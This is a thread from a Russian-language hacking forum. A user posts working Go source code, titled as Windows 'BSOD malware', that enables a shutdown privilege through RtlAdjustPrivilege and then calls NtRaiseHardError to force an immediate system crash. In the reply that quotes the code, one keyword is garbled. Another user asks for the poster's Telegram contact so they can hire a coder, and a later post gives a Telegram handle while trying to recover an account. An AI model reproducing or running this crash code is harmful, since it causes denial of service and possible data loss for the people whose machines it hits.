• XSS.stack #1 – первый литературный журнал от юзеров форума

golang windows bsod malware

servik44lk

HDD-drive
Пользователь
Регистрация
30.03.2023
Сообщения
26
Реакции
5
hello this is my code for run bsod ( blue screen of death ) on windows using winapi

Код:
// bsod generator module for windows
package main

import (
    "fmt"
    "unsafe"
    "syscall"
)
// import ndtll.dll functions
var (
    ntDll              = syscall.MustLoadDLL("ntdll.dll")
    NtRaiseHardError   = ntDll.MustFindProc("NtRaiseHardError")
    RtlAdjustPrivilege = ntDll.MustFindProc("RtlAdjustPrivilege")
)
//   crash the system using NtRaiseHardError winapi function
func main() {
     fmt.Println("warning running bsod screen crash and process closed !")
     POINTER := 0
     RtlAdjustPrivilege.Call(uintptr(19), uintptr(1), uintptr(0), uintptr(unsafe.Pointer(&POINTER)))
     NtRaiseHardError.Call(uintptr(0xc0000006), uintptr(0), uintptr(0), uintptr(0), uintptr(6), uintptr(unsafe.Pointer(&POINTER)))
}
 
hello this is my code for run bsod ( blue screen of death ) on windows using winapi

Код:
// bsod generator module for windows
package main

import (
    "fmt"
    "unsafe"
    "syscall"
)
// import ndtll.dll functions
was (
    ntDll              = syscall.MustLoadDLL("ntdll.dll")
    NtRaiseHardError   = ntDll.MustFindProc("NtRaiseHardError")
    RtlAdjustPrivilege = ntDll.MustFindProc("RtlAdjustPrivilege")
)
//   crash the system using NtRaiseHardError winapi function
func main() {
     fmt.Println("warning running bsod screen crash and process closed !")
     POINTER := 0
     RtlAdjustPrivilege.Call(uintptr(19), uintptr(1), uintptr(0), uintptr(unsafe.Pointer(&POINTER)))
     NtRaiseHardError.Call(uintptr(0xc0000006), uintptr(0), uintptr(0), uintptr(0), uintptr(6), uintptr(unsafe.Pointer(&POINTER)))
}
bro you are a golang coder ? send me your tg i need a coder
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Hello, this is my new account, since I lost the servik44lk password, tell me how I can help you

Hello, I'm sorry, if there is any administrator, I have evidence that I am the user servi44lk, look in the chats, there is a telegram contact --> lulske1
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх